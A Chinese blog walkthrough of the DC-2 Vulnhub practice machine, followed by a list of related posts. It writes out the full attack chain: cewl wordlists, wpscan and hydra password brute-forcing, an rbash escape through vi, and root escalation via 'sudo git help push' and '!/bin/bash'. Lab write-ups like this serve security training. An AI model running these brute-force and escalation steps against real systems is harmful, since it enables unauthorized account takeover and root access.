DC-2靶机渗透测试(cewl,wpscan,hydra爆破,rbash逃逸,vi提权,git提权)

已于 2022-03-17 19:16:32 修改
阅读量3k 收藏 17
点赞数
分类专栏: DC靶机-渗透测试 文章标签: 网络协议 网络 安全
于 2022-03-17 19:03:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/single_g_l/article/details/123547424
版权

目录

一. 环境

二. 信息收集(识别目标主机,端口,拿到flag1)

01. 主机发现

02.访问地址192.168.1.8:80

03. 注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件

04. 配置hosts文件,再次访问,拿到flag1

​三. wpscan枚举,cwel生成字典,爆破获取密码,登录用户,拿到flag2

01. 使用cewl生成密码

02. 确定是wordpress,使用wpscan工具扫描,枚举出了用户

03. wpscan爆破拿到密码

04. 利用dirb工具 或 dirsearch工具进行目录扫描,找到登录界面

05. 登录tom用户,没有找到flag;登录jerry用户,拿到flag

四. Hydra爆破ssh密码,进行ssh远程登录,拿到flag3

01. hydra爆破ssh(这里可以用上面的密码字典和账号)

02. 爆破成功,ssh远程登录,tom成功登录,找到flag3

03. cat无法查看文件,被“rbash”限制了,尝试用vi,

五. 获取su命令权限,利用su提权到jerry获取flag4

01. 尝试使用vi绕过,但没有成功。下面是vi绕过rbash方法。

02. 判断需要添加环境变量,拿到su权限。(根据echo $PATH返回的内容判断的)

03. su提权到jerry,拿到flag4。

六. 最后可能是需要拿到root权限,获取final-flag5

01. 列出目前可执行的命令,利用git提权 

02. 在交互式界面输入!/bin/bash,获取root权限

03. 拿到final-flag.txt

一. 环境

靶机:192.168.1.8

攻击机kali:192.168.1.209

(l网络配置都是NAT模式)

----开始---渗透

二. 信息收集(识别目标主机,端口,拿到flag1)

01. 主机发现

1. nmap -sP 192.168.1.0/24  或  arp-scan -l    #识别目标主机
 
2. nmap -sn 192.168.1.0/24 #主机发现
 
3. nmap -sS -A -p- 192.168.1.184  #识别目标主机服务,端口
 
  -A 全面系统检测、启用脚本检测、扫描等
  -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限

nmap扫描后,发现80,7744端口

02.访问地址192.168.1.8:80

从80端口寻找突破口,访问一下http://192.168.1.8:80,发现URL栏写的不是靶机的ip,而是http://dc-2/,而很明显,DNS没有解析出来

03. 注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件

04. 配置hosts文件,再次访问,拿到flag1

sudo vim /etc/hosts       #编辑host文件
在文件添加:192.168.1.8(靶机ip) dc-2

三. wpscan枚举,cwel生成字典,爆破获取密码,登录用户,拿到flag2

WordPress 是一个免费的开源内容管理系统,用 PHP 编写,并与 MySQL 或 MariaDB 数据库配对。功能包括插件架构和模板系统。 cewl是一个网页关键字抓取工具,cewl是一个kali自带的密码生成工具,WordPress有一个kali自带扫描工具wpscan可以爆破网站的用户名,想到用关键字作为密码继续进行爆破。

通过flag1中的cewl--->生成字典,wordpress--->wpscan扫描工具(可以爆破网站的用户名)

01. 使用cewl生成密码

1. cewl -w dc2_passwords.txt http://dc-2  #生成字典

02. 确定是wordpress,使用wpscan工具扫描,枚举出了用户

1. wpscan --url dc-2 -e u 或 wpscan --url http://dc-2 --enumerate u #暴力枚举用户名
   
   得出结果有三个用户admin,jerry,tom,将这三个用户保存在us.txt文件中(可以用vi写入)

   wpscan --url dc-2    #扫描wordpress的版本和ip等信息

2. 开始爆破
   wpscan --url http://dc-2 -U users.txt dc2_Passswords.txt    或者

   wpscan --ignore-main-redirect --url 192.168.1.8 --enumerate u --force

03. wpscan爆破拿到密码

wpscan --ignore-main-redirect --url 192.168.1.8 --enumerate u --force

04. 利用dirb工具 或 dirsearch工具进行目录扫描,找到登录界面

1. dirb http://dc-2 或者 python dirsearch.py -u http://dc-2 #目录扫描

05. 登录tom用户,没有找到flag;登录jerry用户,拿到flag

flag2中提示wordpress找不到利用漏洞,目录遍历没有获取有用的信息。

四. Hydra爆破ssh密码,进行ssh远程登录,拿到flag3

01. hydra爆破ssh(这里可以用上面的密码字典和账号)

1. hydra -L user.dic -P pwd.dic ssh://192.168.1.104 -s 7744 -vV

02. 爆破成功,ssh远程登录,tom成功登录,找到flag3

03. cat无法查看文件,被“rbash”限制了,尝试用vi,

1. compgen -c       #查看可以使用的指令
2. vi flag3.txt     #查看内容

 提示tom、jerry和su,flag4的获取需要su提权到jerry

五. 获取su命令权限,利用su提权到jerry获取flag4

su命令被限制,无法进行操作,需要绕过rbash命令限制。(可以了解下rbash逃逸)

01. 尝试使用vi绕过,但没有成功。下面是vi绕过rbash方法。

vi   #直接vi编辑 (ESC-->shift+:)执行下面两条命令
:set shell=/bin/sh
:shell

02. 判断需要添加环境变量,拿到su权限。(根据echo $PATH返回的内容判断的)

1. echo $PATH #查看路径
2. #添加环境变量
   export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

03. su提权到jerry,拿到flag4。

六. 最后可能是需要拿到root权限,获取final-flag5

sudo -l  #列出目前用户可执行与无法执行的指令。
//--git提权
sudo git help push #进入git交互式界面
!/bin/bash         #输入命令回车,拿到root权限
//--拿到final_flag.txt
cd /root

01. 列出目前可执行的命令,利用git提权 

02. 在交互式界面输入!/bin/bash,获取root权限

03. 拿到final-flag.txt

小小丸子551
关注
专栏目录
Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权)
qq_45722813的博客
11-20 2159
Vulnhub靶场渗透测试系列-DC-2
DC-2 靶机实战------rbash绕过、git提权WPScan的使用
z2560088的博客
09-25 320
安装DC-2 网卡开启NAT模式 开始攻击 攻击机kali (192.168.160.0/24)使用wpscan、cewlhydra、dirb、nmap等工具 信息搜集 nmap -sP 192.168.160.0/24 确定DC-2 IP 192.168.160.140 扫描具体开放的端口 nmap -sV 192.168.160.140 -p- -A 得知SSH开放和http开放,访问http://192.168.160.140 发现ip重定向有问题需.
DC-2 渗透测试
Darklord.W
04-13 522
DC-2渗透测试 0x00实验环境 靶机DC-2,IP地址:192.168.8.133 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 Masscan以及nmap扫描 修改hosts文件,访问web 发现是wordpress的CMS并得到提示需要cewl制作针...
DC-2靶机渗透学习记录
tyut_dummy的博客
07-14 1936
1)根据flag3提示,我们应该进行提权,切换为jerry用户,但是shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功su jerry。1)根据flag2提示,我们要去寻找其他攻击渗透点,所以我们把目光放到靶机的第二个端口7744端口。打开了一个shell(部分功能依旧不可用),进入/home/jerry目录下查看文件flag4.txt。1)根据flag1提示,我们使用cewl工具,提取网页中关键词,生成密码字典。3)进入/root目录查看最终flag文件,完成DC-2靶机渗透。
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1906
dc-2实验
DC-2靶机渗透测试详细教程
啊醒的博客
05-04 1024
DC-2靶机渗透测试详细教程
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2945
DC-2靶机渗透测试思路及流程
靶机DC-2练习:通过rbash绕过获取shell,使用git命令提权
7Riven's blog
12-24 1836
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
DC-2靶机渗透详细过程(附靶机链接)
bwt_D的博客
06-20 332
DC-2靶机下载链接: https://pan.baidu.com/s/1g8nEs5K0MYBCfQr-bGla-w 提取码:3xt9 查看kali主机ip:ifconfig 查看靶机的MAC地址:打开虚拟机设置,点击网络适配器,选择nat 模式,点击高级。 使用nmap扫描目标ip:nmap -sP 192.168.159.0/24 对比mac地址发现,目标靶机ip为192.168.159.139 使用nmap扫描端口:nmap -A 192.168.159.139 -p 1-65535 发现8
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1841
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
[渗透测试篇]Vulnhub之靶机DC-2
qq_43668710的博客
05-11 689
文章目录靶机描述实验环境渗透思路获取目标IP(netdiscover)端口扫描(nmap)生成密码(cewl)获取用户名(wpscan)暴力破解(hydra)登录后台全端口扫描/SSH登录逃脱受限shell/导入$PATHgit 提权知识总结DC-系列 靶机描述 共有五个标志,包括最终标志.任务就是跟着逐一放出的flag提示拿到最终的flag. 实验环境 攻击机:kali 目标机:DC-2 涉及工具: 'netdiscover':获取目标IP 'nmap':信息收集/端口扫描/Web服务判断 'cewl
渗透测试学习之vulnhub系列靶机——DC2
jingzhou_666的博客
06-11 1463
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用。
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1823
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2(VI GIT提权)
E1even的博客
08-25 885
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VI提权FLAG5:GIT提权 kali攻击????:192.168.78.131 目标主机:192.168.78.xxx 环境配置参照DC-1 扫描网段内存活主机及其开放端口 使用命令查询主机所在网段 ifconfig 得到网段192.168.78.xxx,扫描该网段内其他存活的主机 nmap -sP 192.168.78.0/24 发现192.168.
【Vulnhub靶机渗透测试】之DC-2 (git命令提权
Pluto.的博客
12-27 732
文章目录Vulnhub靶机渗透测试DC-21. 信息收集2. 漏洞利用3. 提权 Vulnhub靶机渗透测试DC-2 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-2,311/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 1. 信息收集 使用 nmap 扫描 192.168.40.0/24 网段存活主机 发现靶机IP为:192.168.40.143。 使用 nmap 扫
rbash绕过
weixin_43705814的博客
12-29 3326
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进行限制呢,有以下几个原因: 1.提高安全性,防止黑客和渗透测试人员的入侵 2.限制一些会对系统造成危害的危险命令 3.为了提高渗透测试人员的个人能力,在一些靶机上设置受限的shell让测试人员绕过拿flag 二、常见的绕过方法 2.
DC-2靶机(ssh远程SUID(VIM)提权
JyajT的博客
04-23 271
dc系列
【网安神器篇】——WPScan漏洞扫描工具
最新发布
Spontaneous_0的博客
08-16 1055
Wordpress作为三大建站模板之一,在全世界范围内有大量的用户,特别是学校网站非常爱用,这也导致白帽子都会去跟踪WordPress的安全漏洞,Wordpress自诞生起也出现了很多漏洞。Wordpress还可以使用插件主题。于是Wordpress本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞。通过插件,主题的漏洞去渗透Wordpress站点,于是WPScan应运而生,收集Wordpress的各种漏洞,形成一个Wordpress专用扫描器WPScan是Kali Linux默认自带。
DC-2靶机进行渗透测试
zll___的博客
03-11 794
DC-2靶机进行渗透测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值